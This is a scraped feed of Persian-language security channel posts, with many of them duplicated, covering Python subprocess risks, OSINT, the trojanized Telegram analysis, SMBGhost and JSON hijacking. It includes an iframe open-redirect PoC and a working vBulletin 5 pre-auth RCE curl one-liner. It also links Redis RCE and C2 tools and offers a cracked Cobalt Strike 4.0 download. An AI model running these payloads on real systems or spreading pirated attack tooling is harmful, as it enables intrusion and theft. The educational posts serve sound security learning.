#python #secure_coding #coding #code
اگر با کتابخونه subprocess در پایتون کار کرده باشید حتما قطعه کد مقابل رو دیدید:
از لحاظ امنیتی این کد مشکل داره؟
جواب: بله!
اما چرا؟ وقتی شما مقدار shell رو برابر با True قرار بدید subprocess شِل رو در اختیار میگیره و به Shell میگه دستور رو اجرا کن (subshell). در واقع یعنی تمامی متغیر های محیطی (Variables) و تمامی ویژگیهای شل، قبل از اجرای دستور echo $HOME، پردازش میشوند.
یه مثال برای اینکه خودتون به چشم ببینید خروجی رو میتونید اجرا کنید:
اگر با کتابخونه subprocess در پایتون کار کرده باشید حتما قطعه کد مقابل رو دیدید:
import subprocess
print(subprocess.call('echo $HOME', shell=True))
از لحاظ امنیتی این کد مشکل داره؟
جواب: بله!
اما چرا؟ وقتی شما مقدار shell رو برابر با True قرار بدید subprocess شِل رو در اختیار میگیره و به Shell میگه دستور رو اجرا کن (subshell). در واقع یعنی تمامی متغیر های محیطی (Variables) و تمامی ویژگیهای شل، قبل از اجرای دستور echo $HOME، پردازش میشوند.
یه مثال برای اینکه خودتون به چشم ببینید خروجی رو میتونید اجرا کنید:
>>> import subprocess@securation
>>> subprocess.call('echo $HOME')
Traceback (most recent call last):
...
OSError: [Errno 2] No such file or directory
>>>
>>> subprocess.call('echo $HOME', shell=True)
/user/invoxes
#tip #osint #metadata
یکی از نکات حائز اهمیت اینه وقتی دارید جمعآوری اطلاعات یا OSINT انجام میدید به اشتباه Metadata هارو حذف نکنید.
عکسی که مشاهده میکنید دانلود یک فایل یکسان با wget و firefox هست که در یک روز دانلود شده. فایلی که با wget گرفته شده تاریخ آپلود اون فایل روی سرور یا تاریخ ساخت فایل بوده (بستگی به این داره سرور متادیتا فایل رو دستکاری کرده باشه یا خیر) و فایل دانلود شده با firefox، تاریخ دانلود توسط کاربر یعنی امروز زده شده.
@securation
یکی از نکات حائز اهمیت اینه وقتی دارید جمعآوری اطلاعات یا OSINT انجام میدید به اشتباه Metadata هارو حذف نکنید.
عکسی که مشاهده میکنید دانلود یک فایل یکسان با wget و firefox هست که در یک روز دانلود شده. فایلی که با wget گرفته شده تاریخ آپلود اون فایل روی سرور یا تاریخ ساخت فایل بوده (بستگی به این داره سرور متادیتا فایل رو دستکاری کرده باشه یا خیر) و فایل دانلود شده با firefox، تاریخ دانلود توسط کاربر یعنی امروز زده شده.
@securation
#iframe #injection #openredirect
صددرصد تا حالا با آسیبپذیری Iframe Injection آشنا شدید، اما به جز فیشینگ و بارگزاری صرفا یک صفحهی دیگه چه کار دیگه ای میشه انجام داد؟ Open Redirect.
کافیه یک فایل html ایجاد کنید و قطعه کد جاوااسکریپتی مانند زیر در آن نوشته و ذخیره کنید: (فرضا poc.html)
نکته: دقت داشته باشید هنگام هاستینگ poc.html مقدار X-Frame-Options در وبسرور شما (مهاجم) تنظیم نشده باشد. تو عکس بالا من به صورت موقت هدر X-Frame-Options رو به X-Frame-Optio تغییر نام دادم. علت اینکار اجازهی ساخت iframe از سایت شما توسط وبسایت آسیبپذیر میباشد.
@securation
صددرصد تا حالا با آسیبپذیری Iframe Injection آشنا شدید، اما به جز فیشینگ و بارگزاری صرفا یک صفحهی دیگه چه کار دیگه ای میشه انجام داد؟ Open Redirect.
کافیه یک فایل html ایجاد کنید و قطعه کد جاوااسکریپتی مانند زیر در آن نوشته و ذخیره کنید: (فرضا poc.html)
<body>حالا کافیه تو iframe وبسایت قربانی آدرس فایلتون رو تزریق کنید مانند:
<noscript>
top.window.location = "https://attacker.site";
</noscript>
</body>
<iframe src="http://attackingserver.site/poc.html">
حالا با باز نمودن وبسایت آسیبپذیر، کاربر به سمت https://attacker.site که در اسکریپت poc.html نوشته شده بود، انتقال مییابد.نکته: دقت داشته باشید هنگام هاستینگ poc.html مقدار X-Frame-Options در وبسرور شما (مهاجم) تنظیم نشده باشد. تو عکس بالا من به صورت موقت هدر X-Frame-Options رو به X-Frame-Optio تغییر نام دادم. علت اینکار اجازهی ساخت iframe از سایت شما توسط وبسایت آسیبپذیر میباشد.
@securation
15-redis-post-exploitation.pdf
1.2 MB
یک اسلاید خیلی خوب جهت Post Exploitation در Redis. البته از اونجایی که امنیت خیلی از پایگاه دادههای Redis در محیطهای عملیاتی به خوبی پیاده سازی شده و حتی Authentication ندارند، میشه گفت اسلاید بیشتر Exploitation هست تا Post-Exploitation.
تو اسلاید از معماری و تحلیل پروتکل گفته شده تا RCE.
پیشنهاد میکنم یک نگاهی بهش بندازید.
همچنین دو تا ابزار در گیتهاب که برای RCE در Redis هست که احتمالا بدردتون خواهد خورد.
https://github.com/n0b0dyCN/redis-rogue-server
https://github.com/Ridter/redis-rce
@securation
تو اسلاید از معماری و تحلیل پروتکل گفته شده تا RCE.
پیشنهاد میکنم یک نگاهی بهش بندازید.
همچنین دو تا ابزار در گیتهاب که برای RCE در Redis هست که احتمالا بدردتون خواهد خورد.
https://github.com/n0b0dyCN/redis-rogue-server
https://github.com/Ridter/redis-rce
@securation
#IoT #Analyzer #C #SourceCodeAnalysis #Automation
یکی از نکات مهم در هنگام تست نفوذ و آنالیز، صرفه جویی در وقت هست.
یکی از ابزارهای خوب و قدرتمند جهت کشف آسیبپذیری های مرتبط با BOF و Integer Overflow و ... ابزار flawfinder میباشد که با تحلیل کد این کار رو به سادگی برای ما انجام میده. اما با کمی دانش بش اسکریپتینگ میشه این فرآیند رو برای تمامی فایلهای سی به صورت خودکار انجام داد.
این ابزار میتونه برای تحلیل کد های سی در نرمافزارها و سورس Firmware های IoT خیلی کاربردی باشه. همچنین این ابزار پشتیبانی کامل از CWE رو داره.
اسکریپت:
https://github.com/david-a-wheeler/flawfinder
نصب:
https://github.com/david-a-wheeler/flawfinder/blob/master/INSTALL.md
@securation
یکی از نکات مهم در هنگام تست نفوذ و آنالیز، صرفه جویی در وقت هست.
یکی از ابزارهای خوب و قدرتمند جهت کشف آسیبپذیری های مرتبط با BOF و Integer Overflow و ... ابزار flawfinder میباشد که با تحلیل کد این کار رو به سادگی برای ما انجام میده. اما با کمی دانش بش اسکریپتینگ میشه این فرآیند رو برای تمامی فایلهای سی به صورت خودکار انجام داد.
این ابزار میتونه برای تحلیل کد های سی در نرمافزارها و سورس Firmware های IoT خیلی کاربردی باشه. همچنین این ابزار پشتیبانی کامل از CWE رو داره.
اسکریپت:
find . -regex ".*\.c$" | while read c_file; do echo "\n############$c_file############";flawfinder $c_file | egrep -i "\(port\)|\(buffer\)|\(shell\)|\(integer\)|Hits = "; done
لینک گیتهاب:https://github.com/david-a-wheeler/flawfinder
نصب:
https://github.com/david-a-wheeler/flawfinder/blob/master/INSTALL.md
@securation
تو یه گروهی بودم که یکی از دوستان از این تبلیغاتهای ناگهانی که تلگرامهای غیررسمی میفرستن رو فرستاد با شعار دور زدن فیلترینگ. منم دیدم فرصت خوبیه تا یه نگاهی بندازم ببینم اپلیکیشن چیکار میکنه. عکسی که فرستادم رو مشاهده کنید.
سمت راست تلگرام رسمیه و سمت چپ تلگرام غیر رسمی که ایشون داشت.
چند تا چیز جالب داشت این برنامه که با هم ببینیم.
یکی اینکه تمامی فایل های تلگرام اصلی داخل تلگرام غیر رسمی هم وجود داشت یعنی طرف اومده فقط جاسوس افزارش رو اضافه کرده به فایل های تلگرام اصلی و تمام دسترسی هارو از برنامه اصلی گرفته و به پکیج خودش که تو ترمینال سمت راست یه نمونش که grep کردم تو diff مشخصه اضافه کرده. 😉
سمت چپ یه سری کد نوشته طرف که میاد چک میکنه ببینه اون برنامه ها رو گوشی نصبه یا نه!!! خیلی وقت نذاشتم ببینم چرا همچین کاری میکنه ولی مسلما دلیل خوبی نمیتونه داشته باشه :)
تو لیست سمت چپ سابلایم هم مشخصه همه چی که چه فایل هایی جدید اضافه شده.
این تلگرام غیر رسمی هم که فرستاده صرفا داره از سایفون استفاده میکنه برای دور زدن فیلترینگ 😂
@securation
سمت راست تلگرام رسمیه و سمت چپ تلگرام غیر رسمی که ایشون داشت.
چند تا چیز جالب داشت این برنامه که با هم ببینیم.
یکی اینکه تمامی فایل های تلگرام اصلی داخل تلگرام غیر رسمی هم وجود داشت یعنی طرف اومده فقط جاسوس افزارش رو اضافه کرده به فایل های تلگرام اصلی و تمام دسترسی هارو از برنامه اصلی گرفته و به پکیج خودش که تو ترمینال سمت راست یه نمونش که grep کردم تو diff مشخصه اضافه کرده. 😉
سمت چپ یه سری کد نوشته طرف که میاد چک میکنه ببینه اون برنامه ها رو گوشی نصبه یا نه!!! خیلی وقت نذاشتم ببینم چرا همچین کاری میکنه ولی مسلما دلیل خوبی نمیتونه داشته باشه :)
تو لیست سمت چپ سابلایم هم مشخصه همه چی که چه فایل هایی جدید اضافه شده.
این تلگرام غیر رسمی هم که فرستاده صرفا داره از سایفون استفاده میکنه برای دور زدن فیلترینگ 😂
@securation
Security Analysis
تو یه گروهی بودم که یکی از دوستان از این تبلیغاتهای ناگهانی که تلگرامهای غیررسمی میفرستن رو فرستاد با شعار دور زدن فیلترینگ. منم دیدم فرصت خوبیه تا یه نگاهی بندازم ببینم اپلیکیشن چیکار میکنه. عکسی که فرستادم رو مشاهده کنید. سمت راست تلگرام رسمیه و سمت چپ…
لیست دستورات و کارهای انجام شده:
دیکامپایل کردن APK:
-
-
-
-
@securation
دیکامپایل کردن APK:
-
Jadx (jadx app.apk -o ~/Desktop/jadx-out)
مقایسه فایل Manifest با تلگرام اصلی:-
diff resources/AndroidManifest.xml ../jadx-out/resources/AndroidManifest.xml
پیدا کردن آیپی های موجود در برنامه:-
grep -HnroE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"
پیدا کردن URL های موجود در برنامه:-
grep -riE "http://|https://|ahr0"
لیست کردن سورس های جدید اضافه شده به برنامه و بررسی دستی آنها.@securation
#smb #smbghost #cve_2020_0796
از آسیب پذیریهای جدیدی که سر و صدا به پا کرده آسیبپذیری SMBGhost با CVE-2020-0796 هست. در پروتکل SMB یک هدر با نام COMPRESSION_TRANSFORM_HEADER وجود داره که شامل 5 هدر فوق میباشد:
- ProtocolId
- OriginalCompressedSegmentSize
- CompressionAlgorithm
- Flags
- Offset/Length
آسیبپذیری مذکور از جایی شروع میشه که فانکشن srv2.sys از جمع دو مقدار OriginalCompressedSegmentSize و Offset/Length برای allocate کردن سایز بافر، بدون چک کردن معتبر بودن این آدرس استفاده میکنه.
برای توضیحات بیشتر پیشنهاد میکنم مطلب زیر رو از Mcafee بخونید
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796
همچنین اسکنر این آسیبپذیری برای اثبات وجود و عدم وجود در سیستم رو میتونید از لینک زیر دریافت کنید:
https://github.com/ollypwn/SMBGhost
@securation
از آسیب پذیریهای جدیدی که سر و صدا به پا کرده آسیبپذیری SMBGhost با CVE-2020-0796 هست. در پروتکل SMB یک هدر با نام COMPRESSION_TRANSFORM_HEADER وجود داره که شامل 5 هدر فوق میباشد:
- ProtocolId
- OriginalCompressedSegmentSize
- CompressionAlgorithm
- Flags
- Offset/Length
آسیبپذیری مذکور از جایی شروع میشه که فانکشن srv2.sys از جمع دو مقدار OriginalCompressedSegmentSize و Offset/Length برای allocate کردن سایز بافر، بدون چک کردن معتبر بودن این آدرس استفاده میکنه.
برای توضیحات بیشتر پیشنهاد میکنم مطلب زیر رو از Mcafee بخونید
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796
همچنین اسکنر این آسیبپذیری برای اثبات وجود و عدم وجود در سیستم رو میتونید از لینک زیر دریافت کنید:
https://github.com/ollypwn/SMBGhost
@securation
McAfee Blog
SMBGhost – Analysis of CVE-2020-0796 | McAfee Blog
The Vulnerability The latest vulnerability in SMBv3 is a “wormable” vulnerability given its potential ability to replicate or spread over network shares
#json #json_hijacking #hijacking #api
یکی دیگه از آسیبپذیریهای کمتر شناخته شده، آسیبپذیری Json Hijacking میباشد. به موجب این آسیبپذیری نفوذگر میتواند مقادیر بازگشتی Json را بدون اینکه نیاز به وجود آسیبپذیری CORS باشد بخواند. این آسیبپذیری در صورتی رخ میدهد که امکان ارسال درخواست با متد GET وجود داشته باشد. البته اگر خروجی Json هم اطلاعات حساسی نباشد میتوان این آسیبپذیری را نادیده گرفت زیرا اطلاعات ارزشمندی در اختیار ما قرار نخواهد داد.
به منظور اکسپلویت این آسیبپذیری کافیست یک صفحه HTML ساخته و API را در تگ noscript آدرسدهی کرد. سپس با استفاده از
به مقدار آن دسترسی پیدا کرد. حال کافیست نفوذگر شخص قربانی را به صفحهی نوشته شده توسط نفوذگر هدایت کند تا مقدار حیاتی را به سرقت ببرد.
برای اطلاعات بیشتر میتوانید از لینک زیر کمک بگیرید:
https://haacked.com/archive/2009/06/25/json-hijacking.aspx
@securation
یکی دیگه از آسیبپذیریهای کمتر شناخته شده، آسیبپذیری Json Hijacking میباشد. به موجب این آسیبپذیری نفوذگر میتواند مقادیر بازگشتی Json را بدون اینکه نیاز به وجود آسیبپذیری CORS باشد بخواند. این آسیبپذیری در صورتی رخ میدهد که امکان ارسال درخواست با متد GET وجود داشته باشد. البته اگر خروجی Json هم اطلاعات حساسی نباشد میتوان این آسیبپذیری را نادیده گرفت زیرا اطلاعات ارزشمندی در اختیار ما قرار نخواهد داد.
به منظور اکسپلویت این آسیبپذیری کافیست یک صفحه HTML ساخته و API را در تگ noscript آدرسدهی کرد. سپس با استفاده از
Object.prototype.__defineSetter__("key of the sensitive value")به مقدار آن دسترسی پیدا کرد. حال کافیست نفوذگر شخص قربانی را به صفحهی نوشته شده توسط نفوذگر هدایت کند تا مقدار حیاتی را به سرقت ببرد.
برای اطلاعات بیشتر میتوانید از لینک زیر کمک بگیرید:
https://haacked.com/archive/2009/06/25/json-hijacking.aspx
@securation
👍1
Forwarded from Security Analysis
cobaltstrike4.0-Fixed.zip
24.4 MB
#CobaltStrike #Cobalt_Strike #RedTeam
دوستانی که در حوزهی Red Team فعالیت میکنن حتما با ابزار Cobalt Strike آشنایی دارن. این ابزار یک فریمورک قدرتمند برای Post-Exploitation هست که آخرین نسخه اون یعنی 4 رو به صورت کاملا کرک شده قرار دادهایم.
دوستانی که در حوزهی Red Team فعالیت میکنن حتما با ابزار Cobalt Strike آشنایی دارن. این ابزار یک فریمورک قدرتمند برای Post-Exploitation هست که آخرین نسخه اون یعنی 4 رو به صورت کاملا کرک شده قرار دادهایم.
Web Based Command Control Framework (C2) #C2 #PostExploitation #CommandControl #RedTeam #C2Framework #PHPC2 #.NETMalware #Malware #PHPMalware #CnC #infosec #offensivesecurity #Trojan
https://github.com/EnginDemirbilek/NorthStarC2
@securation
https://github.com/EnginDemirbilek/NorthStarC2
@securation
GitHub
GitHub - eng1ndes/NorthStarC2: Web Based Command Control Framework (C2) #C2 #PostExploitation #CommandControl #RedTeam #C2Framework…
Web Based Command Control Framework (C2) #C2 #PostExploitation #CommandControl #RedTeam #C2Framework #PHPC2 #.NETMalware #Malware #PHPMalware #CnC #infosec #offensivesecurity #Trojan - eng1ndes/Nor...
قطعا خیلی از سازمان ها از اخرین تکنولوژی ها مانند ngfw ها و بهترین edr ها استفاده کرده اند. اما سوال این است آیا برای امن سازی پورت ۹۱۰۰ کاری انجام داده اید؟
این پورت مربوط به پرینترهای Officejet pro شرکت HP است که در صورتی که در شبکه خود دارید یا علاقه مند به دانستن خطرات باز بودن این پورت هستید خواندن مقاله زیر خالی از لطف نیست! 😃
“HP Officejet pro Printers dork by Rapidsafeguard”
https://link.medium.com/Csu2KxbLm7
این پورت مربوط به پرینترهای Officejet pro شرکت HP است که در صورتی که در شبکه خود دارید یا علاقه مند به دانستن خطرات باز بودن این پورت هستید خواندن مقاله زیر خالی از لطف نیست! 😃
“HP Officejet pro Printers dork by Rapidsafeguard”
https://link.medium.com/Csu2KxbLm7
Medium
HP OfficeJet Pro Printers dork by Rapidsafeguard
Printer cyber attack
A new pre-auth 0day RCE exploit for vBulletin 5:
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#web #expdev #rce #0day #darw1n @securation
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#web #expdev #rce #0day #darw1n @securation
رایت آپ کشف آسیب پذیری RCE و آنلاک مودم/روتر Seowon Slc-130
https://virgool.io/@maj0rmil4d/رایت-آپ-کشف-آسیب-پذیری-در-مودمروتر-seowon-slc-130-iggc9ij95vxz
@securation
https://virgool.io/@maj0rmil4d/رایت-آپ-کشف-آسیب-پذیری-در-مودمروتر-seowon-slc-130-iggc9ij95vxz
@securation
ویرگول
رایت آپ کشف آسیب پذیری RCE و آنلاک مودم/روتر های Seowon Slc-130 و SLR-120S
سلام ، با رایت آپ کشف RCE از روتر Seowon Slc-130 در خدمتتون هستیم .